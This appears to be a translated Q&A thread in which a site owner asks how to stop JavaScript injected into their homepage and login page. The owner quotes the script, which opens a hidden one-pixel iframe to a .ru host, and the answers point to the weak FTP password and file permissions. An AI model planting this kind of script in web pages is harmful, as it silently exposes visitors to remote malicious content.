0

今天早上我注意到一些 Javascript 已添加到我的托管站点。当我下载主页时,代码就像 <!--04b037--><script type="text/javascript"language="javascript"> (function () { var ipexz = document.createElement('iframe'); ipexz.src = 'http://nypmivhy.ru/count5.php'; ipexz.style.position = 'absolute'; ipexz.style.border = '0'; ipexz.style.height = '1px'; ipexz.style.width = '1px'; ipexz.style.left = '1px'; ipexz.style.top = '1px'; if (!document.getElementById('ipexz')) { document.write('<div id=\'ipexz\'></div>'); document.getElementById('ipexz').appendChild(ipexz); }})();</script><!--/04b037--> 在登录页面中:

(function () { var usyux = document.createElement('iframe'); usyux.src = 'http://nypmivhy.ru/count5.php'; usyux.style.position = 'absolute'; usyux.style.border = '0'; usyux.style.height = '1px'; usyux.style.width = '1px'; usyux.style.left = '1px'; usyux.style.top = '1px'; if (!document.getElementById('usyux')) { document.write('
'); document.getElementById('usyux').appendChild(usyux); }})();" method="post"> Email

我猜它是病毒/垃圾邮件攻击。虽然我现在删除了 javascript 代码,但我想知道如何防止我的网站受到此类攻击。注意:我的 FTP 密码很弱。

4

2 回答 2

2

注意:我的 FTP 密码很弱。

你知道你做错了什么,但你还在问吗?首先解决这个问题,同时保护您的计算机,如果您使用脚本,请查看日志以了解黑客尝试并确保它们的安全。

于 2012-12-31T05:54:31.520 回答
1

检查文件的权限是否正确,否则可能是代码被注入。

看看这个:

http://ag.arizona.edu/ecat/web/permissions.html

您必须为文件设置 3 个主要权限:

read from the file
write to the file
execute the file

这是权限的摘要

在此处输入图像描述

于 2012-12-31T06:03:05.130 回答